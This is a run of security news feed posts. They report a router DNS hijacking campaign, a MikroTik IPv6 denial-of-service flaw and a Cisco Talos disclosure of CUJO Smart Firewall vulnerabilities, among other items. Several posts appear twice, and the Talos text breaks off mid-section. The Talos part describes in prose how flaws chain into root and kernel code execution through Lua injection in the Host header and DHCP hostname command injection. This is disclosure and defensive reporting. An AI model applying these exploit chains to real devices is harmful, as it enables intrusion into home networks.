Security Affairs: DNS hijacking campaigns target Gmail, Netflix, and PayPal users

Security experts at Bad Packets uncovered a DNS hijacking campaign that is targeting the users of popular online services, including Gmail, Netflix, and PayPal.

Experts at Bad Packets uncovered a DNS hijacking campaign that has been ongoing for the past three months, attackers are targeting the users of popular online services, including Gmail, Netflix, and PayPal.

Hackers compromised consumer routers and modified the DNS settings to redirect users to fake websites designed to trick victims into providing their login credentials.

Bad Packets experts have identified four rogue DNS servers being used by attackers to hijack user traffic.

“Over the last three months, our honeypots have detected DNS hijacking attacks targeting various types of consumer routers.” reads the report published by Bad Packets. “All exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169). In this campaign, we’ve identified four distinct rogue DNS servers being used to redirect web traffic for malicious purposes.”

Experts pointed out that all exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169).

The first wave of DNS hijacking attacks targeted D-Link DSL modems, including D-Link DSL-2640B, DSL-2740R, DSL-2780B, and DSL-526B. The DNS server used in this attack was hosted by OVH Canada (66[.]70.173.48).

The second wave of attacks targeted the same D-Link modems, but attackers used a different rogue DNS server (144[.]217.191.145) hosted by OVH Canada.

DNS hijacking compromised_d-link

“As Twitter user “parseword” noted, the majority of the DNS requests were being redirected to two IPs allocated to a crime-friendly hosting provider (AS206349) and another pointing to a service that monetizes parked domain names (AS395082).” continues the experts.

The third wave of attacks observed in March hit a larger number of router models, including ARG-W4 ADSL routers, DSLink 260E routers, Secutech routers, and TOTOLINK routers.

The fourth DNS hijacking attacks originated from three distinct Google Cloud Platform hosts and involved two rogue DNS servers hosted in Russia by Inoventica Services (195[.]128.126.165 and 195[.]128.124.131).

In all the DNS hijacking attacks the operators performed an initial recon scan using Masscan. Attackers check for active hosts on port 81/TCP before launching the DNS hijacking exploits.

The campaigns aim at users Gmail, PayPal, Netflix, Uber, attackers also hit several Brazilian banks. , says

Experts found over 16,500 vulnerable routers potentially exposed to this DNS hijacking campaign.

“Establishing a definitive total of vulnerable devices would require us to employ the same tactics used by the threat actors in this campaign. Obviously this won’t be done, however we can catalog how many are exposing at least one service to the public internet via data provided by BinaryEdge” continues Bad Packets.

Experts explained that attackers abused Google’s Cloud platform for these attacks because it is easy for everyone with a Google account to access a “Google Cloud Shell.” This service offers users the equivalent of a Linux VPS with root privileges directly in a web browser.

Further technical details, including IoCs, are reported in the analysis published by Bad Packets:

https://badpackets.net/ongoing-dns-hijacking-campaign-targeting-consumer-routers/

Pierluigi Paganini

(SecurityAffairs – DNS hijacking, hacking)

The post DNS hijacking campaigns target Gmail, Netflix, and PayPal users appeared first on Security Affairs.



Security Affairs

DoS flaw in several MikroTik Routers exploited in attacks

A vulnerability could be exploited by attackers to trigger a denial-of-service (DoS) condition on devices running RouterOS.

MikroTik routers made the headlines again, the company disclosed this week technical details about a year-old vulnerability that exposes the device to remote attacks.

Attackers could exploit the vulnerability to trigger a denial-of-service (DoS) condition on devices running RouterOS.

RouterOS contained several IPv6 related resource exhaustion issues, that have now been fixed, taking care of the above-mentioned CVE entries.” reads a blog post published by MikroTik.

“The first issue caused the device to reboot if traffic to a lot of different destination addresses was routed. The reboot was caused by watchdog timer since the device was overloaded and stopped responding”

The Latvian vendor already released security updates for the RouterOS that addressed the flaw (CVE-2018-19299), but according to the experts, some of the affected devices continue to be vulnerable.

The CVE-2018-19299 vulnerability affects unpatched MikroTik devices that routes IPv6 packets. An attacker could exploit the issue by sending a specific sequence of IPv6 packets that saturate the RAM usage.

“After that reboot was fixed, another issue caused the memory to be filled, because IPv6 route cache size could be bigger than the available RAM. This also was fixed, by introducing automatic cache size calculation based on available memory.” continues the post.

MikroTik addressed the issues in RouterOS versions that were published April, 2019 (all release chains: RouterOSv6.44.2 RouterOS v6.45beta23 and RouterOSv6.43.14 . 

Experts discovered that the fix for the DoS flaw only works only devices with more than 64MB of RAM.


MikroTik trainer Javier Prieto tested the issue on a Cloud Hosted Router (CHR) with 256MB of RAM, he observed that the attack caused the additional usage of 20Mib.

“I have done several tests with GNS3 using CHR 6.44.2 (stable) and as long as the router has enough memory, it doesn’t crash. In my tests, the attack ‘steals’ around 180 MiB.” explained Prieto.

“Using a CHR with 256 MB, system resources shows a total memory of 224 MiB and free-memory of 197 MiB before attack. During the attack, only from one computer, the free memory decreases to around 20 MiB and sometimes to 13 MiB. Using two attackers, it seems the results are the same and not worst. With 200 MB the router reboots because OOM.”

The flaw was reported by several experts, including Isalski, back on April 16, 2018. The expert explained that the vendor acknowledged the flaw, but that it did not classify it as a security vulnerability.

In March Isalski reported the flaw to several emergency response team and disclosed evidence of the exploitation of the vulnerability in attacks in the wild.

Isalski confirmed that the CVE-2018-19299 flaw “affects almost any of MikroTik’s devices, even those used as ‘core’ or ‘backhaul’ routers.”

“More than 20 RouterOS versions have been released since MikroTik learned about the vulnerability.” reported Bleeping computer. “One reason for this, besides dismissing its security risk, is that flaw is at kernel level and it is very difficult to fix. A member of the company’s support team said that RouterOS v6 has an older kernel version and it cannot be changed.”

Experts believe that the vendor will introduce some optimizations in the next beta version of RouterOS for hardware with low RAM resource.

Pierluigi Paganini

(SecurityAffairs – CVE-2018-19299, MikroTik)

The post DoS flaw in several MikroTik Routers exploited in attacks appeared first on Security Affairs.

Security Affairs: DoS flaw in several MikroTik Routers exploited in attacks

A vulnerability could be exploited by attackers to trigger a denial-of-service (DoS) condition on devices running RouterOS.

MikroTik routers made the headlines again, the company disclosed this week technical details about a year-old vulnerability that exposes the device to remote attacks.

Attackers could exploit the vulnerability to trigger a denial-of-service (DoS) condition on devices running RouterOS.

“RouterOS contained several IPv6 related resource exhaustion issues, that have now been fixed, taking care of the above-mentioned CVE entries.” reads a blog post published by MikroTik.

“The first issue caused the device to reboot if traffic to a lot of different destination addresses was routed. The reboot was caused by watchdog timer since the device was overloaded and stopped responding”

The Latvian vendor already released security updates for the RouterOS that addressed the flaw (CVE-2018-19299), but according to the experts, some of the affected devices continue to be vulnerable.

The CVE-2018-19299 vulnerability affects unpatched MikroTik devices that routes IPv6 packets. An attacker could exploit the issue by sending a specific sequence of IPv6 packets that saturate the RAM usage.

“After that reboot was fixed, another issue caused the memory to be filled, because IPv6 route cache size could be bigger than the available RAM. This also was fixed, by introducing automatic cache size calculation based on available memory.” continues the post.

MikroTik addressed the issues in RouterOS versions that were published April, 2019 (all release chains: RouterOSv6.44.2 RouterOS v6.45beta23 and RouterOSv6.43.14

Experts discovered that the fix for the DoS flaw only works only devices with more than 64MB of RAM.


MikroTik trainer Javier Prieto tested the issue on a Cloud Hosted Router (CHR) with 256MB of RAM, he observed that the attack caused the additional usage of 20Mib.

“I have done several tests with GNS3 using CHR 6.44.2 (stable) and as long as the router has enough memory, it doesn’t crash. In my tests, the attack ‘steals’ around 180 MiB.” explained Prieto.

“Using a CHR with 256 MB, system resources shows a total memory of 224 MiB and free-memory of 197 MiB before attack. During the attack, only from one computer, the free memory decreases to around 20 MiB and sometimes to 13 MiB. Using two attackers, it seems the results are the same and not worst. With 200 MB the router reboots because OOM.”

The flaw was reported by several experts, including Isalski, back on April 16, 2018. The expert explained that the vendor acknowledged the flaw, but that it did not classify it as a security vulnerability.

In March Isalski reported the flaw to several emergency response team and disclosed evidence of the exploitation of the vulnerability in attacks in the wild.

Isalski confirmed that the CVE-2018-19299 flaw “affects almost any of MikroTik’s devices, even those used as ‘core’ or ‘backhaul’ routers.”

“More than 20 RouterOS versions have been released since MikroTik learned about the vulnerability.” reported Bleeping computer. “One reason for this, besides dismissing its security risk, is that flaw is at kernel level and it is very difficult to fix. A member of the company’s support team said that RouterOS v6 has an older kernel version and it cannot be changed.”

Experts believe that the vendor will introduce some optimizations in the next beta version of RouterOS for hardware with low RAM resource.

Pierluigi Paganini

(SecurityAffairs – CVE-2018-19299, MikroTik)

The post DoS flaw in several MikroTik Routers exploited in attacks appeared first on Security Affairs.



Security Affairs

New malware can modify CT and MRI scan results

By Waqas

Call it killer malware? Israeli researchers have developed a new malware that highlights some very critical and dangerous security vulnerabilities in medical imaging equipment, which is commonly used to diagnose serious health conditions like cancer and hypertrophic cardiomyopathy (HCM). Not only can the malware impact the diagnosis of the imaging equipment but can also compromise […]

This is a post from HackRead.com Read the original post: New malware can modify CT and MRI scan results

One Year In: How our $5B investment in IoT and intelligent edge is accelerating customer, partner and solution innovation

One year ago, we announced our commitment to invest $5B in IoT (Internet of Things) and intelligent edge – technology that is accelerating ubiquitous computing and bringing unparalleled opportunity for transformation across industries. Our commitment is to a build trusted, easy to use platform for our customers and partners to build solutions – no matter where they are starting in their IoT journey.

Our customers are embracing IoT as a core strategy to drive better business outcomes, improve safety and address social issues – from predicting and preventing equipment failures, optimizing smart buildings for space utilization and energy management and improving patient outcomes and worker safety. From the intelligent cloud to the intelligent edge, this year has been one of tremendous growth – in IoT technology portfolio, partner ecosystem and customer momentum – and we are only just beginning.

Accelerating customer innovation in IoT from cloud to edge across industries

What’s truly exciting is seeing our customers achieve real business outcomes with Azure IoT and intelligent edge-based solutions. Our IoT platform is powering customer solutions with thousands of devices, at scale, and the number of devices supported has grown nearly 150 percent year-over-year. This year, many customers such a Starbucks, Chevron, Walmart, Walgreens, BMW, Volkswagen, Toyota Material Handling Group and more are leveraging Azure as their cloud platform with IoT and AI services to accelerate their digital transformation.

Starbucks is using Azure Sphere to connect select equipment, enabling its partners (employees) more opportunity to engage with customers. This includes everything from beverage consistency, waste reduction, the management of energy consumption and predictive maintenance.

With Azure and our IoT services, Chevron is connecting a critical piece of equipment – heat exchangers, which manage the heat from fluids flowing through it as part of the plant’s fuel processing – to do predictive maintenance and ultimately prevent unscheduled outages.

In Walmart’s technology center in Austin, Texas, which is designed accelerate digital innovation, the retail leader is embracing IoT as a way to save energy and prevent product loss. Walmart is using thousands of IoT sensors on HVAC and refrigeration systems that process a billion daily data messages from stores worldwide.

As part of Microsoft’s partnership with Walgreens Boots Alliance (WBA) to make health care delivery more personal, affordable and accessible for people around the world, WBA will use a portfolio of connected IoT devices for nonacute chronic care management, delivered by Microsoft’s cloud, AI and IoT technologies.

This week with BMW Group, we announced the Open Manufacturing Platform (OMP), a new technology framework and open community to share smart factory solutions across the automotive and manufacturing sectors to significantly accelerate future industrial IoT developments.

This year Volkswagen announced a partnership with Microsoft to create the Volkswagen Automotive Cloud with Azure and Azure IoT Edge to create a seamless experience for drivers from the moment they enter, use and leave their vehicles. From 2020 onwards, more than 5 million new Volkswagen brand vehicles per year will be fully connected and will be part of the IoT cloud.

By infusing solutions with artificial intelligence, mixed reality and the IoT, Toyota Material Handling Group is providing solutions to customers meet the global rise in ecommerce, and move goods quickly, frequently, accurately and safely. With Microsoft technologies, the solutions range from connected forklift and field service systems available today to AI-powered concepts that pave the way for intelligent automation and logistics simulations – all designed with Toyota’s standards for optimizing efficiency, operation assisting and continuous improvement.

The stories continue to roll in.

New innovations in our IoT platform

In the last year, we launched more than 100 new services and features in our IoT platform, designed to make IoT solutions more secure and scalable, reduce complexity, make our platform more open and create opportunities in new market areas. Our core focus has been to address the industry challenge of securing connected devices at every layer, as well as advancing IoT to create a more seamless experience between the physical and digital worlds.

Simplifying IoT and securing IoT endpoints at scale

IoT is complex, requiring deep knowledge of cloud, security and devices, but the business benefits are significant. With Azure IoT Central, which became generally available this year, we have created a way for businesses to get started in IoT by quickly provisioning a solution in just a matter of hours and with built-in security features. With valuable data moving closer to the edge, IoT security demands a holistic approach. This year we introduced Azure Sphere, a world-class security solution for connected microcontroller devices (MCUs), which go in everything from smart-home and medical devices to equipment on the factory floor. Windows 10 IoT Core Services includes security and reliability updates for the operating system to keep device security up to date. Azure Security Center for IoT now includes support for Azure IoT services to proactively monitor IoT devices, enabling businesses to implement security best practices for detecting and mitigating threats.

Delivering spatial intelligence at scale

IoT is no longer just about connected endpoints. It’s the sum of the endpoints – the digital objects – that create a holistic solution. We see significant opportunity for our customers to use spatial intelligence to manage physical assets and spaces with digital models and mapping across smart spaces, cities and buildings. This fall, we introduced Azure Digital Twins to enable customers and partners to query data in the context of a space – rather than from disparate sensors – empowering them to build repeatable, scalable experiences that correlate data from digital sources and the physical world. Azure Maps provides developers from all industries powerful geospatial capabilities, and new MR services including Azure Spatial Anchors and Azure Remote Rendering enable customers to create precise points of interest in with mixed reality in physical space as well as enable interactive, high-quality 3D models.

Bringing AI to the edge

The proliferation of IoT devices and resulting massive amount of data requiring real-time intelligence are fueling the need to move compute and analytics closer to where the data resides. This year, we open sourced the Azure IoT Edge runtime, providing developers have even greater flexibility and control of their edge solutions, enabling them to modify the runtime and debug issues for applications at the edge. Over the past year, we added five new Azure Cognitive Services that can run locally on an edge device, and we’ve made it easier to deploy your own Azure Machine Learning models on Azure IoT Edge. We’ve also enabled high-speed inferencing at the edge with Azure Data Box Edge.

 Growing the Microsoft IoT partner ecosystem

We’re proud to have one of the largest and fastest-growing partner ecosystems with more than ten thousand IoT partners from intelligent edge to intelligent cloud. Partners are critical to our customers’ success in IoT, bringing rich domain expertise across industries so customers can see clear value to their business, as well as integration for critical apps and infrastructure to increase time to value.

This year, we announced more than 70 new partnerships in IoT, which help our customers build IoT solutions faster. At CES we announced our collaboration with Universal Electronics to launch a new digital assistant platform for the home built on Microsoft Azure using AI and IoT services. PTC announced ThingWorx Industrial Innovation Platform on Microsoft Azure to deliver a robust solution for Industrial IoT and digital product lifecycle management. At MWC, we announced new partnerships with SAP, and Cradlepoint. SAP Leonardo IoT will integrate with Azure IoT services providing our customers with the ability to contextualize and enrich their IoT data with SAP business data within SAP Leonardo IoT to drive new business outcomes. With Cradlepoint, we’re enabling customers to connect their IoT infrastructure to cloud-based applications to a global satellite communications network and to help bridge the OT and IT collaboration gap, respectively.

We’re also working with several device partners to accelerate development at the intelligent edge. With Qualcomm, we created an Azure IoT Starter Kit to enable developers vision AI solution and run their AI models on the device. With NXP, we announced the public preview for Windows 10 IoT Core with built-in Azure connectivity, to enable secure, power-optimized devices for the intelligent edge. We’re also partnering with NVIDIA and DJI to integrate third-party SDKs to simplify development and increase time to value of AI applications at the edge.

Looking ahead: Industry opportunity in IoT

We are one year into our four-year investment. Our priority over the next three years is clear: make it easy for any company to create scalable, secured IoT solutions. We partnered with Boston Consulting Group (BCG) to better understand the trends and opportunity for the industry at large. Our findings, captured in the whitepaper here, indicate IoT is moving into broad adoption and yet, some of the greatest barriers to success are not just about technology – it’s also about business strategy and executive leadership. More than 60 percent of executives we surveyed indicated these to be bigger elements of success than technology. One in four executives we surveyed indicated that their companies’ IoT initiatives underperformed expectations. The findings highlight key ingredients for a successful IoT innovation project. You’ll continue to see more announcements from us and our partners and customers to help our customers and partners in their IoT journeys. You can read more about adoption of IoT across industries in the BCG whitepaper.

The post One Year In: How our $5B investment in IoT and intelligent edge is accelerating customer, partner and solution innovation appeared first on The Official Microsoft Blog.

Radware Blog: Application SLA: Knowing Is Half the Battle

Applications have come to define the digital experience. They empower organizations to create new customer-friendly services, unlock data and content and deliver it to users at the time and device they desire, and provide a competitive differentiator over the competition. Fueling these applications is the “digital core,” a vast plumbing infrastructure that includes networks, data […]

The post Application SLA: Knowing Is Half the Battle appeared first on Radware Blog.



Radware Blog

Tesla autopilot feature hacked to risk oncoming traffic

By Waqas

Tesla’s High-End Vehicle’s Lane Recognition System not Free from Technical Glitches- Keen Labs Claims in New Research. Cybersecurity firm Keen Labs published a research paper [PDF] on Saturday in which it described the three hacks that the company detected that can be used to manipulate Tesla Model S. The first two hacks were directed towards the […]

This is a post from HackRead.com Read the original post: Tesla autopilot feature hacked to risk oncoming traffic

Encryption deployment increases as organizations struggle to address compliance requirements

As organizations embrace the cloud and new digital initiatives such as the IoT, blockchain and digital payments the use of trusted cryptography to protect their applications and sensitive information is

The post Encryption deployment increases as organizations struggle to address compliance requirements appeared first on The Cyber Security Place.

McAfee Blogs: The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, users are extremely reliant on our GPS devices. In fact, we’re so reliant on these devices that map features are programmed into almost every IoT device we use as well as inside of our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering, what will cause this rollover issue? GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into a foot of location error.

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with a nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.



McAfee Blogs

The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams

Today, users are extremely reliant on our GPS devices. In fact, we’re so reliant on these devices that map features are programmed into almost every IoT device we use as well as inside of our vehicles. However, the Department of Homeland Security has issued an alert to make users aware of a GPS receiver issue called the GPS Week Number Rollover that is expected to occur on or around April 6, 2019. While this bug is only expected to affect a small number of older GPS devices, users who are impacted could face troubling results.

You may be wondering, what will cause this rollover issue? GPS systems count weeks using a ten-bit parameter, meaning that they start counting at week zero and then reset when they hit week 1,024, or 19.5 years. Because the last reset took place on August 21, 1999, it appears that the next reset will occur on April 6, 2019. This could result in devices resetting their dates and potentially corrupting navigation data, which would throw off location estimates. That means your GPS device could misrepresent your location drastically, as each nanosecond the clock is out translates into a foot of location error.

So, how does this rollover issue translate into a potential cyberthreat? It turns out that the main fix for this problem is to ensure that your GPS device’s software is up-to-date. However, due to the media attention that this bug is receiving, it’s not far-fetched to speculate that cybercriminals will leverage the issue to target users with phishing attacks. These attacks could come in the form of email notifications referencing the rollover notice and suggesting that users install a fraudulent software patch to fix the issue. The emails could contain a malicious payload that leaves the victim with a nasty malware on their device.

While it’s difficult to speculate how exactly cybercriminals will use various events to prey on innocent users, it’s important to be aware of potential threats to help protect your data and safeguard your devices. Check out the following tips to help you spot potential phishing attacks:

  • Validate the email address is from a recognized sender. Always check the validity of signature lines, including the information on the sender’s name, address, and telephone number. If you receive an email from an address that you don’t recognize, it’s best to just delete the email entirely.
  • Hover over links to see and verify the URL. If someone sends you a link to “update your software,” hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.
  • Be cautious of emails asking you to take action. If you receive a message asking you to update your software, don’t click on anything within the message. Instead, go straight to your software provider’s website. This will prevent you from downloading malicious content from phishing links.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The GPS Rollover Bug: 3 Tips to Help You Avoid Phishing Scams appeared first on McAfee Blogs.

This Week in Security News: Cybersecurity Skills Gap and Legislature

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how the cybersecurity skills gap is affecting organizations. Also, learn how a bipartisan bill is working to close the gap.

Read on:

What Hacker History Can Tell Enterprises About Future Attack Strategy

This report delves into nearly two decades of hacking and malicious activity, which can also help point IT admins and decision-makers in the right direction with their security strategies.

 

Bipartisan Bill Aims to Close Gap in Congressional Cybersecurity

A bipartisan bill aims to close what is regarded as a major gap in congressional cybersecurity and extend the government’s protections to senators and their staffers’ personal phones and computers.

Global Telecom Crime Undermining Internet Security: Cyber-Telecom Crime Report

Understanding the current threat landscape can help reduce the impact of crimes like telecom fraud and prepare us for future threats in the age of the IoT.

These 20-Something Hackers Won $375,000 and a Model 3 for Finding a Tesla Bug

Two hackers exposed a security bug in the Tesla Model 3 that allowed them to hack into the electric car’s internal web browser during hacking competition Pwn2Own, hosted by Trend Micro’s Zero Day Initiative.

Cybersecurity Skills Shortage a Problem for Nearly 50 Percent of Organizations

The skills shortage problem showcased in an Opinium survey showed nearly 50 percent of 1,125 CISO respondents shared that it is a cause for concern for their organizations.

New Research Reveals How Adversarial Attacks Can Subvert Machine Learning Systems

A research paper published in the journal Science warns of the prospect of advanced techniques being used to throw machine learning (ML) systems off.

Norsk Hydro Ransomware Incident Losses Reach $40 Million After One Week

A week after suffering a crippling ‘LockerGoga’ ransomware infection, Norwegian aluminum producer Norsk Hydro estimates that total losses from the incident have already reached $40 million.

‘Long-Term Security Risks’ From Huawei

The Chinese company Huawei has been strongly criticized in a report issued by the National Cyber Security Centre, the body overseeing the security of its products in UK telecoms. 

Astronomical Costs, Geopolitical Headaches: Telecom Fraud is Too Big to Ignore, Report Says

International telecommunications fraud — including activities like consumer scams and corporate ripoffs — costs around $33 billion per year, according to a report published by Trend Micro and Europol.

Do you think the new bipartisan bill will close the cybersecurity gap? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cybersecurity Skills Gap and Legislature appeared first on .

The 7 Biggest Cybersecurity Threats In An IoT World

Everything’s bigger in the Internet of Things. Well, not the devices themselves — those are commonly small enough to hold just a couple of chips and are frequently hidden out

The post The 7 Biggest Cybersecurity Threats In An IoT World appeared first on The Cyber Security Place.

TrendLabs Security Intelligence Blog: Telecom Crimes Against the IoT and 5G

by: Trend Micro Research and Europol’s European Cybercrime Centre (EC3)

Telecommunications or telecom technology is the underpinning of the modern internet, and consequently, the internet’s growing segment, the internet of things (IoT). Likewise, the global telecommunications network we enjoy today has been greatly influenced by the existence and growth of the internet. Between telecom and the internet is a two-way relationship, even an indistinguishable divide for users. We experience this since the very same telecom carriers we subscribe to allow us to connect to the internet. At its best, this relationship is exemplified as advances in network connectivity as we move to 5G. In our paper with Europol’s European Cybercrime Centre (EC3), “Cyber-Telecom Crime Report 2019,” we explore how this relationship can also be used to threaten and defraud the IoT.

The SIM Connection

A common and well-known link that communication devices and internet devices have is the use of a SIM card. For IoT devices to have a unique presence and connection to the internet, they should have a SIM in the same way a phone does. This could be a familiar white SIM card, or something smaller attached to the circuitry of the device. A phone makes or receives calls, SMS, or data. Identically, an IoT device has a SIM to allow it to receive and make calls, SMS, or data.

SIM cards can serve like credit or debit cards in that they are used to initiate billing or connections that have corresponding fees. That’s why SIM cards, unfortunately, can be subject to many of the same frauds and risks credit cards are. In addition, the use of SIM cards — and telecom in general — in fraud appeals to criminals, perhaps because the telecom sector is not under regulation for money laundering controls.

In the case of smart city devices like traffic lights and smart garbage bins, cybercriminals have various ways to abuse SIM cards. They could choose to extract the SIM cards embedded in the IoT devices and use the SIMs to launder money or conduct other illicit activities. In some cases, even when the SIM cards might be difficult to extract, vulnerabilities still lie in how the devices have the capability to change carriers remotely. Moving from one carrier to another creates risks as some carriers could be cooperating with or created by criminals.

Bucketed subscription aggregation is also a problem with the IoT, especially in the development of more complex and large-scale IoT environments like smart cities. Such scale could be met with inadequate security measures, wherein many IoT devices (as many as millions) are aggregated to a single accounting line. When even just a single SIM of these IoT devices is compromised, the fraud it facilitates will be left undetected due to the inadequate accounting oversight.

It is also important to note that even if an IoT device is “dumb” or doesn’t have the ability to call or send messages, it doesn’t mean that its SIM is also limited — a fact that many procurement departments of large-scale IoT implementations might forget. These dumb devices could hold unknown telecom capabilities, ones that could be exploited by cybercriminals for data malware infection or very costly long distance fraud.

Figure 1. IoT SIM supply chain compromise threat model

Figure 1. IoT SIM supply chain compromise threat model

Large IoT Infrastructures

The scalability of IoT is one of its greatest assets, which, in the case of telecom fraudsters, is something of an opportunity as well. Depending on the number of deployed IoT devices and supporting technologies like dedicated servers, its environment can scale from one entire home to an entire city. The larger the scale, the more challenging it would be to monitor each connected device.

Even smaller-scale environments like smart homes, buildings, and factories do not escape the risk of being used for telecom fraud. Although smart factories are typically isolated from the internet, they do still require some form of cellular data connection to perform backups to an offsite location or undergo remote maintenance. Through this connection, cybercriminals can use cyber-telecom vulnerabilities against them and use them for outbound fraud.

Even smart and autonomous vehicles can be subject to the same attacks as mobile phones. Telephony denial of service (TDoS), for example, could cause a smart car to become lost due to a broken internet connection.

Securing Telecom and the IoT

Keeping in mind the connection between IoT and telecom should help in creating defenses against threats that shift from one to the other. Getting a grasp on common channels used by IoT devices can uncover hidden telecom capabilities in them. For IoT devices, simple measures like changing the default settings and credentials of the device can already prevent some of the mentioned telecom attacks.

Telecom technology and the IoT have proven that connectivity can be a powerful tool that helps us save time, improve efficiency, and bridge borders, among others. However, connections that run beyond our awareness can be abused to the detriment of others, through crimes like fraud and money laundering. It is important to acknowledge that there is only so much a single organization or industry can do against an interconnected web of threats. Collaboration and cooperation between all stakeholders, from telecom carriers to security experts and law enforcement, are necessary in keeping our connections safe.

For the complete discussion on telecom threats, read our paper “Cyber-Telecom Crime Report 2019.”

The post Telecom Crimes Against the IoT and 5G appeared first on .



TrendLabs Security Intelligence Blog

Post-Perimeter Security: Addressing Evolving Mobile Enterprise Threats

Experts from Gartner, Lookout and Google talk enterprise mobile security in this webinar replay.

How to Secure Your Home DNS for Under $100

Like many technologists who are also parents, I think a great deal on how best to protect my family online. Working for a security company, I have access to more tools than the average person, so recently I’ve implanted DNS security at home. I focused more on DNS because there are no “services” offered on my home network, and I’m mostly concerned more about my kids or wife clicking on a phishing link or similar outbound malicious traffic.

Vulnerability Spotlight: Multiple Vulnerabilities in CUJO Smart Firewall, Das U-Boot, OCTEON SDK, Webroot BrightCloud


Claudio Bozzato of Cisco Talos discovered these vulnerabilities.

 

Executive summary


CUJO AI produces the CUJO Smart Firewall, a device that provides protection to home networks against a myriad of threats such as malware, phishing websites and hacking attempts. Cisco Talos recently discovered 11 vulnerabilities in the CUJO Smart Firewall. These vulnerabilities could allow an attacker to bypass the safe browsing function and completely take control of the device, either by executing arbitrary code in the context of the root account, or by uploading and executing unsigned kernels on affected systems.

In accordance with our coordinated disclosure policy, Cisco Talos worked with CUJO AI to ensure that these issues are resolved and that a firmware update is available for affected customers. In most typical scenarios the firmware update process is handled by CUJO AI, allowing this update to be deployed to affected customers automatically. Given that these devices are typically deployed to provide protection for networked environments, it is recommended that affected users confirm their devices have been updated as soon as possible to ensure that the devices are no longer affected by these vulnerabilities.

Exploitation


In order to better convey the threat that these issues pose in real-world implementations, this section groups the vulnerabilities based on realistic attack scenarios in which the vulnerabilities would likely be exploited, and illustrates how chaining them together would raise the impact on the device.

CUJO is based on the OCTEON's SDK, which results in a Linux-based operating system running a kernel with PaX patches, which is not common for internet-of-things (IoT) appliances. However, the majority of the vulnerabilities are not affected by this countermeasure.

Remote code execution, unauthenticated, with persistence


We identified two chains that could be used to execute code remotely without authentication.

    1. TALOS-2018-0683 describes a vulnerability in the Webroot BrightCloud SDK, a service used to retrieve websites' classification and reputation data. CUJO uses BrightCloud as part of their safe browsing protection. By exploiting this vulnerability, an unauthenticated attacker could be able to impersonate BrightCloud's services and execute code on the device as the root user. As described in TALOS-2018-0686, the BrightCloud SDK defaults to using HTTP connections to communicate with the remote BrightCloud services, making the exploitation of TALOS-2018-0683 trivial if an attacker is able to intercept traffic between CUJO and BrightCloud. 

    2. CUJO uses the Lunatik Lua engine in order to execute Lua scripts from within the kernel context. This is used to analyze the traffic of the entire network and is part of CUJO's safe browsing protection. TALOS-2018-0703 describes a script injection vulnerability that allows any unauthenticated user in the local network to execute Lua scripts in the kernel by specifying an arbitrary "Host" header in HTTP requests. Since Lunatik permits the use of the unsafe `load()` Lua function, this allows an attacker to execute arbitrary code in the kernel. Additionally, TALOS-2018-0702 describes an issue that can be used to trick CUJO into extracting and analyzing any arbitrary hostname. As shown at the end of the TALOS-2018-0703 advisory, a malicious website could chain both vulnerabilities together in order to force any client machine in CUJO's network to perform a POST request via JavaScript, triggering the Lua injection and effectively executing code in the kernel.
      Note that the vulnerabilities above can also be executed from the local network. Moreover, they can be further chained with the "verified boot bypass" described below in order to permanently compromise the device.

      Local network code execution, unauthenticated


      As previously stated, the two chains above can be exploited from the local network.

      Additionally, we identified two code execution vulnerabilities (TALOS-2018-0653 and TALOS-2018-0672) that affect the parsing of mDNS messages. Note, however, that CUJO constrains the affected `mdnscap` process in a low-privileged chroot-ed environment. Therefore, an attacker would need to escalate their privileges in order to fully compromise the device.

      Smartphone app code execution, with persistence


      CUJO users can download an app on Android and iOS devices to configure their device. Since CUJO acts as a router and serves DHCP requests, it is possible to use the app to set up static DHCP entries. TALOS-2018-0627 shows how to leverage a vulnerability in the way DHCP hostnames are handled in order to execute arbitrary operating system commands as the root user.

      Note that this can be further chained with the "verified boot bypass" described below in order to permanently compromise the device.

      Device-local verified boot bypass (persistence methods)


